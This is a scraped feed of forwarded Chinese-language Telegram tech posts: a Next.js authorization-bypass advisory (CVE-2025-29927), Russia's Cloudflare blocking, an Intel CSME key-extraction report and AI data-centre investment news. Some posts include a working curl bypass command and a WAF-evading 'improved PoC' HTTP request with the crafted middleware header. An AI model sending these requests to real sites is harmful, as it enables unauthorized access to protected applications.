Forwarded from 层叠 - The Cascading
#PSA: Next.js 中间件权限验证漏洞;请尽快更新。
影响 11-15 版本;修复于 14.2.25/15.2.3 版本;mitigation 亦可应用。
zeropath.com/~
cve: CVE-2025-29927
cvss: 9.1 (GitHub)
ghsa: GHSA-f82v-jwr5-mffw
linksrc: https://t.me/hyi0618/6574
#Security #Nextjs
影响 11-15 版本;修复于 14.2.25/15.2.3 版本;mitigation 亦可应用。
zeropath.com/~
cve: CVE-2025-29927
cvss: 9.1 (GitHub)
ghsa: GHSA-f82v-jwr5-mffw
linksrc: https://t.me/hyi0618/6574
#Security #Nextjs
Zeropath
Next.js Middleware Exploit: CVE-2025-29927 Authorization Bypass - ZeroPath Blog
Explore the critical CVE-2025-29927 vulnerability in Next.js middleware, enabling attackers to bypass authorization checks and gain unauthorized access.
Forwarded from Solidot
俄测试网络主权,完全切断 Cloudflare 连接
2025-03-23 19:49 by 十二魔
Gundaz Aghayev 写道:
俄罗斯政府机构 Roskomnadzor 下属的“互联网监控和控制中心” (CMU SSOP) 去年 11 月指责 Cloudflare 部署 Encrypted Client Hello 侵害了各国网络主权,并有效地阻止了其 ECH 连接。在“主权互联网法案”授权之下,他们持续干扰西方科技公司在俄运作,Google 和 Wikipedia 已经“夹着尾巴逃跑了”,接下来是 Cloudflare。
先演习一下,这次在部分地区完全切断 Cloudflare,起初是中部的、与哈萨克斯坦接壤的新西伯利亚州。后来,不同 ISP 和地区的封锁有差异,大体上集中在俄罗斯中部和东部地区,该国的欧洲部分不受影响。用户报告所有使用了 Cloudflare CDN 的网站,都无法被打开。包括邻国的 DeepSeek、测速站 Speedtest、w3.org,以及臭打游戏的们的 Discord、EA、Nexus mods、VRChat。Cloudflare Radar 显示部分 ISP,比如 ZSTTKAS(AS21127)的 HTTP 流量接近清零。
“演习”结束,DeepSeek 率先被解封。这期间一名用户声称使用 chat.deepseek.com 作为 TLS hello,Discord 聊天就能“迅速打开”。本人推测这并不是已被 Cloudflare 禁止的域前置:封锁和解封与否是基于 IP 地址,而不是 HTTPS SNI。
可能的关联是:Roskomnadzor 在本月 20 日说要“对俄罗斯服务和电信运营商使用外国服务器基础设施进行定期技术检查”、以及“研究在确保网络主权的框架内制定改善上述服务的稳定性和安全性的措施”。不过本人看不出来封锁 IP 地址、导致俄国人上不去使用 Cloudflare CDN 的网站是如何改善稳定和安全的。
Cloudflare Status 记录了此次短暂封锁,现在其已被标记为“解决”。
Solidot, 俄罗斯屏蔽 Cloudflare 的 ECH 连接, 2024年11月08日
Interfax, РКН проверит операторов связи на использование ими иностранных серверов, 08:58, 20 марта 2025
ntc.party, Cloudflare заблокировали?, 2025 年 3 月 20 日
wkrp, net4people/bbs#464, Cloudflare blocked in eastern Russia, 2025-03-20, Mar 21, 2025
Cloudflare Radar, Traffic from AS21127
Cloudflare Status, Network Issues in Russia, “This incident has been resolved. Posted Mar 22, 2025 - 21:07 UTC”
#互联网
2025-03-23 19:49 by 十二魔
Gundaz Aghayev 写道:
俄罗斯政府机构 Roskomnadzor 下属的“互联网监控和控制中心” (CMU SSOP) 去年 11 月指责 Cloudflare 部署 Encrypted Client Hello 侵害了各国网络主权,并有效地阻止了其 ECH 连接。在“主权互联网法案”授权之下,他们持续干扰西方科技公司在俄运作,Google 和 Wikipedia 已经“夹着尾巴逃跑了”,接下来是 Cloudflare。
先演习一下,这次在部分地区完全切断 Cloudflare,起初是中部的、与哈萨克斯坦接壤的新西伯利亚州。后来,不同 ISP 和地区的封锁有差异,大体上集中在俄罗斯中部和东部地区,该国的欧洲部分不受影响。用户报告所有使用了 Cloudflare CDN 的网站,都无法被打开。包括邻国的 DeepSeek、测速站 Speedtest、w3.org,以及臭打游戏的们的 Discord、EA、Nexus mods、VRChat。Cloudflare Radar 显示部分 ISP,比如 ZSTTKAS(AS21127)的 HTTP 流量接近清零。
“演习”结束,DeepSeek 率先被解封。这期间一名用户声称使用 chat.deepseek.com 作为 TLS hello,Discord 聊天就能“迅速打开”。本人推测这并不是已被 Cloudflare 禁止的域前置:封锁和解封与否是基于 IP 地址,而不是 HTTPS SNI。
可能的关联是:Roskomnadzor 在本月 20 日说要“对俄罗斯服务和电信运营商使用外国服务器基础设施进行定期技术检查”、以及“研究在确保网络主权的框架内制定改善上述服务的稳定性和安全性的措施”。不过本人看不出来封锁 IP 地址、导致俄国人上不去使用 Cloudflare CDN 的网站是如何改善稳定和安全的。
Cloudflare Status 记录了此次短暂封锁,现在其已被标记为“解决”。
Solidot, 俄罗斯屏蔽 Cloudflare 的 ECH 连接, 2024年11月08日
Interfax, РКН проверит операторов связи на использование ими иностранных серверов, 08:58, 20 марта 2025
ntc.party, Cloudflare заблокировали?, 2025 年 3 月 20 日
wkrp, net4people/bbs#464, Cloudflare blocked in eastern Russia, 2025-03-20, Mar 21, 2025
Cloudflare Radar, Traffic from AS21127
Cloudflare Status, Network Issues in Russia, “This incident has been resolved. Posted Mar 22, 2025 - 21:07 UTC”
#互联网
Forwarded from LoopDNS资讯播报
摧毁x86最后堡垒:Intel电熔丝e-Fuse加密密钥泄漏
安全研究人员发现,英特尔聚合安全与管理引擎(CSME)的硬件安全架构存在关键设计缺陷,导致其根加密密钥(Fuse Encryption Key, FEK)可被提取。FEK用于加密每颗芯片的“安全熔断”(Security Fuses)数据,但由于其自身未启用安全模式且共享于同代平台(如Apollo Lake、Gemini Lake等),攻击者可通过组合漏洞(CVE-2019-0090与CVE-2021-0146)提取FEK,从而解密所有安全熔断信息,彻底破坏信任根(Root of Trust)。
研究指出,问题源于英特尔CSME的硬件加密模块(OCS)设计缺陷:安全密钥存储模块(SKS)未强制为FEK启用安全模式,导致攻击者可利用“已知明文”攻击手段,通过覆盖密钥字节并观察加密结果逆向推导FEK。该漏洞无法通过软件修复,因FEK生成逻辑与硬件熔断配置已固化于芯片内,仅新一代硬件可彻底解决。
此次漏洞影响所有基于Apollo Lake、Gemini Lake等旧平台的设备,涉及嵌入式系统及消费级产品。尽管相关平台已停产,但大量设备仍在使用,且英特尔文档承认其安全模型在FEK泄露后“无法恢复”。
来源:Solidot / PT SWARM
安全研究人员发现,英特尔聚合安全与管理引擎(CSME)的硬件安全架构存在关键设计缺陷,导致其根加密密钥(Fuse Encryption Key, FEK)可被提取。FEK用于加密每颗芯片的“安全熔断”(Security Fuses)数据,但由于其自身未启用安全模式且共享于同代平台(如Apollo Lake、Gemini Lake等),攻击者可通过组合漏洞(CVE-2019-0090与CVE-2021-0146)提取FEK,从而解密所有安全熔断信息,彻底破坏信任根(Root of Trust)。
研究指出,问题源于英特尔CSME的硬件加密模块(OCS)设计缺陷:安全密钥存储模块(SKS)未强制为FEK启用安全模式,导致攻击者可利用“已知明文”攻击手段,通过覆盖密钥字节并观察加密结果逆向推导FEK。该漏洞无法通过软件修复,因FEK生成逻辑与硬件熔断配置已固化于芯片内,仅新一代硬件可彻底解决。
此次漏洞影响所有基于Apollo Lake、Gemini Lake等旧平台的设备,涉及嵌入式系统及消费级产品。尽管相关平台已停产,但大量设备仍在使用,且英特尔文档承认其安全模型在FEK泄露后“无法恢复”。
来源:Solidot / PT SWARM
层叠 - The Cascading
#PSA: Next.js 中间件权限验证漏洞;请尽快更新。 影响 11-15 版本;修复于 14.2.25/15.2.3 版本;mitigation 亦可应用。 zeropath.com/~ cve: CVE-2025-29927 cvss: 9.1 (GitHub) ghsa: GHSA-f82v-jwr5-mffw linksrc: https://t.me/hyi0618/6574 #Security #Nextjs
所以说加上一个header就能绕过认证......
https://github.com/fourcube/nextjs-middleware-bypass-demo
curl -I -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000
https://github.com/fourcube/nextjs-middleware-bypass-demo
GitHub
GitHub - fourcube/nextjs-middleware-bypass-demo: Demo for Next.js middleware bypass - CVE-2025-29927
Demo for Next.js middleware bypass - CVE-2025-29927 - fourcube/nextjs-middleware-bypass-demo
Forwarded from 科技圈🎗在花频道📮
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from 科技圈🎗在花频道📮
阿里巴巴主席蔡崇信警示AI数据中心建设或现泡沫
阿里巴巴集团董事长蔡崇信在香港汇丰全球投资峰会上表示,全球范围内的数据中心建设热潮可能正在形成泡沫,投资速度可能超出AI服务的初期需求。
微软、软银等科技巨头正投入巨资购买英伟达、SK海力士的AI芯片,阿里巴巴也计划在三年内投资3800亿元人民币。然而,部分数据中心项目在缺乏明确客户的情况下就开始融资和建设。
蔡崇信特别指出,美国在AI基础设施上的投资过热。仅今年,亚马逊、谷歌和Meta已承诺分别投资1000亿、750亿和650亿美元。尽管微软高管否认过度投资的风险,分析师已发现其取消部分数据中心租约的迹象。蔡崇信警告,当前的投资可能远超短期需求,需警惕市场过热。
彭博社
📮投稿 ☘️频道 🌸聊天
阿里巴巴集团董事长蔡崇信在香港汇丰全球投资峰会上表示,全球范围内的数据中心建设热潮可能正在形成泡沫,投资速度可能超出AI服务的初期需求。
微软、软银等科技巨头正投入巨资购买英伟达、SK海力士的AI芯片,阿里巴巴也计划在三年内投资3800亿元人民币。然而,部分数据中心项目在缺乏明确客户的情况下就开始融资和建设。
蔡崇信特别指出,美国在AI基础设施上的投资过热。仅今年,亚马逊、谷歌和Meta已承诺分别投资1000亿、750亿和650亿美元。尽管微软高管否认过度投资的风险,分析师已发现其取消部分数据中心租约的迹象。蔡崇信警告,当前的投资可能远超短期需求,需警惕市场过热。
彭博社
📮投稿 ☘️频道 🌸聊天
Forwarded from Eternal_安全内参
CVE-2025-29927/改良版Poc:
GET / HTTP/2
Host: target
Accept-Encoding: gzip, deflate, br
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Cache-Control: max-age=0